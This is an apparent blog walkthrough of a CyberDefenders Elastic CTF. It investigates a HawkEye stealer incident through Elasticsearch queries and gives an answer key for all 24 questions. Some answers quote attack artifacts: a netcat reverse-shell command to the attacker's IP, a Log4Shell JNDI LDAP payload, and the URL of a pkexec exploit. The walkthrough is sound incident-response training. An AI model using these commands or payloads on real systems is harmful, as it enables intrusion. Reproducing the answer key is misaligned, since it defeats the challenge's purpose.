CyberDefenders - Elastic CTF
Intro
CyberDefenders.org hosted a challenging HawkEye stealer challenge. You, the challenger/IR team, have to investigate an incident using Elasticsearch and answer questions about the infected victim and the attack narrative.
For those who don't know about CyberDefenders, they host a platform dedicated to training blue team skills (incident response, digital forensics, security analysis, etc.). If you are used to VulnHub and Hack The Box, those services are typically geared more towards red teaming and penetration testing. This is where CyberDefenders stands out!
Walkthrough
1) Who downloads the malicious file which has a double extension?
- search: file.name:..* and rule.name:Downloads
Answer:
ahmed
2) What is the hostname he was using?
Answer:
DESKTOP-Q1SL9P2
3) What is the name of the malicious file?
Answer:
Acount_details.pdf.exe
4) What is the attacker’s IP address?
Hint:
- time: feb 2 15:30+
- search: related.user:ahmed
- filter: destination.ip:exists
Answer:
192.168.1.10
5) Another user with high privilege runs the same malicious file. What is the username?
- remove related.user from previous search
Answer:
cybery
6) The attacker was able to upload a DLL file of size 8704. What is the file name?
- search: related.user:cybery and event.type:"creation"
Answer:
mCblHDgWP.dll
7) What parent process name spawns cmd with NT AUTHORITY privilege and pid 10716?
- search: process.pid :10716
- log: winlogbeat
Answer:
rundll32.exe
8) The previous process was able to access a registry key. What is the full path of the registry key?
Hint:
- log: logs-*
- search: process.name:"rundll32.exe"
- time: feb 2 15:00+
Answer:
HKLM\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy\Enabled
9) PowerShell process with pid 8836 changed a file in the system. What was that filename?
- search: event.type:"change" and process.name:powershell.exe
- log: logs-*
Answer:
ModuleAnalysisCache
10) PowerShell process with pid 11676 created files with the ps1 extension. What is the first file that has been created?
- search: event.type:"creation" and process.name:powershell.exe and process.pid:11676
- log: logs-*
Answer:
__PSScriptPolicyTest_bymwxuft.3b5.ps1
11) What is the machine's IP address that is in the same LAN as a Windows machine?
This one threw up sharding issues for me.
Eventually, looking around the time of the attack and the address range 192.168.10.1/24, we found our answer.
Answer:
192.168.10.30
12) The attacker logged in to the Ubuntu machine after a brute force attack. What is the username he successfully logged in with?
- search: event.action:"ssh_login"
- log: logs-*
- time: feb 2 15:30+
Answer:
salem
13) After that, the attacker downloaded the exploit from the GitHub repo using wget. What is the full URL of the repo?
- search: user.name:"salem" and wget
- log: logs-*
Answer:
https://raw.githubusercontent.com/joeammond/CVE-2021-4034/main/CVE-2021-4034.py
14) After the attacker runs the exploit, which spawns a new process called pkexec, what is the process's md5 hash?
Tricky one, but if we search on the pids 3003/3004 from the previous answer…
- search: process.name:"pkexec" and process.pid:3003
- log: logs-*
Answer:
3a4ad518e9e404a6bad3d39dfebaf2f6
15) Then the attacker gets an interactive shell by running a specific command on the process with pid 3011 as the root user. What is the command?
Answer:
bash -i
16) What is the hostname that raised the alert signal.rule.name:"Netcat Network Activity"?
Hint:
- switch to Security -> Rules
Answer:
CentOS
17) What is the username who ran netcat?
Answer:
solr
18) What is the parent process name of netcat?
Answer:
java
19) If you focus on the nc process, you can get the entire command that the attacker ran to get a reverse shell. Write the full command.
Answer:
nc -e /bin/bash 192.168.1.10 9999
20) From the previous three questions, you may remember a famous Java vulnerability. What is it?
Answer:
log4shell
21) What is the entire log file path of the “solr” application?
Hint:
- log: logs-*
- search: file.name:solr*
Answer:
/var/solr/logs/solr.log
22) What is the path that is vulnerable to log4j?
Hint:
- log: filebeat
- search: log.file.path:"/var/solr/logs/solr.log"
Answer:
/admin/cores
23) What is the GET request parameter used to deliver log4j payload?
Answer:
foo
24) What is the JNDI payload that is connected to the LDAP port?
Answer:
{foo=${jndi:ldap://192.168.1.10:1389/Exploit}}